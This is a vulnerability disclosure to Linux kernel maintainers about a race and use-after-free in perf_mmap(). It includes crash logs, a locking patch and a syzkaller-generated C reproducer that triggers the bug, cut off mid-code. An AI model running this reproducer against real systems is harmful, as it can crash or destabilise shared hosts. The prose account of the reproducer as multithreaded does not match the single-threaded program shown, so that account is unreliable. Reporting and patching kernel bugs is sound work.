A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition in which a ring_buffer object's reference count is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel later attempts to access or increment it. I verified this on Linux kernel version 6.18.5.

Environment
-----------

- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------

The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning. The full report is below:

audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race between memory mapping and event teardown. It follows this execution flow:

1. Event creation: it initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded hammering: the program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The race: thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability trigger: because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/warning: when thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0", resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------

The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
-----

From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
 	}

 	return ret;
 }
--
2.51.0

Request
-------

Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS:  000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
 __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
 </TASK>
---[ end trace 0000000000000000 ]---

Syzkaller reproducer:

# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)

C reproducer:

// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif

static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
  if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
    exit(sig);
  }
  uintptr_t addr = (uintptr_t)info->si_addr;
  const uintptr_t prog_start = 1 << 20;
  const uintptr_t prog_end = 100 << 20;
  int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
  int valid = addr < prog_start || addr > prog_end;
  if (skip && valid) {
    _longjmp(segv_env, 1);
  }
  exit(sig);
}

static void install_segv_handler(void)
{
  struct sigaction sa;
  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = SIG_IGN;
  syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
  syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
  memset(&sa, 0, sizeof(sa));
  sa.sa_sigaction = segv_handler;
  sa.sa_flags = SA_NODEFER | SA_SIGINFO;
  sigaction(SIGSEGV, &sa, NULL);
  sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...)                                              \
  ({                                                                 \
    int ok = 1;                                                      \
    __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST);             \
    if (_setjmp(segv_env) == 0) {                                    \
      __VA_ARGS__;                                                   \
    } else                                                           \
      ok = 0;                                                        \
    __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST);             \
    ok;                                                              \
  })

#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len)         \
  *(type*)(addr) =                                                       \
      htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) |     \
            (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul,
          /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
          /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul,
          /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  const char* reason;
  (void)reason;
  install_segv_handler();
  intptr_t res = 0;
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }
  // pkey_mprotect arguments: addr=VMA[0x2000], len=0x2000,
  // prot: mmap_prot=0x5, key: pkey (resource)
  syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
          /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
  // perf_event_open arguments: attr: ptr[in, perf_event_attr] with
  // type=0x2, size=0x80, config0=0x8, config1=0x1, config2=0x8, config3=0x1,
  // sample_freq=0x2, sample_type=0x84143, read_format=0x10; bitfields:
  // disabled=1, inherit=1, pinned=1, exclude_kernel=1, exclude_hv=1,
  // exclude_idle=1, comm=1, task=1, precise_ip=3, mmap_data=1,
  // sample_id_all=1, exclude_callchain_kernel=1, mmap2=1, comm_exec=1,
  // write_backward=1, bpf_event=1, inherit_thread=1 (all other bitfields 0);
  // wakeup_events=0x7fff, bp_type=0x2, bp_config=perf_config_ext{0x29a, 0x8},
  // branch_sample_type=0x1800, sample_regs_user=0x7, sample_stack_user=0x10000,
  // clockid=0x1, sample_regs_intr=0x4, aux_watermark=0xffffff7f,
  // sample_max_stack=0xfffe, aux_sample_size=0x8000003, sig_data=0x7;
  // pid: pid (resource), cpu=0x1, group: fd_perf (resource),
  // flags: perf_flags=0x8; returns fd_perf
  NONFAILING(*(uint32_t*)0x200000000000 = 2);
  NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
  NONFAILING(*(uint8_t*)0x200000000008 = 8);
  NONFAILING(*(uint8_t*)0x200000000009 = 1);
  NONFAILING(*(uint8_t*)0x20000000000a = 8);
  NONFAILING(*(uint8_t*)0x20000000000b = 1);
  NONFAILING(*(uint32_t*)0x20000000000c = 0);
  NONFAILING(*(uint64_t*)0x200000000010 = 2);
  NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
  NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
  NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
  NONFAILING(*(uint32_t*)0x200000000034 = 2);
  NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
  NONFAILING(*(uint64_t*)0x200000000040 = 8);
  NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
  NONFAILING(*(uint64_t*)0x200000000050 = 7);
  NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
  NONFAILING(*(uint32_t*)0x20000000005c = 1);
  NONFAILING(*(uint64_t*)0x200000000060 = 4);
  NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
  NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
  NONFAILING(*(uint16_t*)0x20000000006e = 0);
  NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
  NONFAILING(*(uint32_t*)0x200000000074 = 0);
  NONFAILING(*(uint64_t*)0x200000000078 = 7);
  res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
                /*cpu=*/1ul, /*group=*/(intptr_t)-1,
                /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
  if (res != -1)
    r[0] = res;
  // mmap arguments: addr=VMA[0x1000], len=0x1000, prot: mmap_prot=0x0,
  // flags: mmap_flags=0x11, fd: fd (resource), offset=0x0
  syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul,
          /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul,
          /*fd=*/r[0], /*offset=*/0ul);
  // perf_event_open arguments: same perf_event_attr as above;
  // pid: pid (resource), cpu=0x1, group=r0 (fd_perf),
  // flags: perf_flags=0x2; returns fd_perf
  NONFAILING(*(uint32_t*)0x200000000000 = 2);
  NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
  NONFAILING(*(uint8_t*)0x200000000008 = 8);
  NONFAILING(*(uint8_t*)0x200000000009 = 1);
  NONFAILING(*(uint8_t*)0x20000000000a = 8);
  NONFAILING(*(uint8_t*)0x20000000000b = 1);
  NONFAILING(*(uint32_t*)0x20000000000c = 0);
  NONFAILING(*(uint64_t*)0x200000000010 = 2);
  NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
  NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
  NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
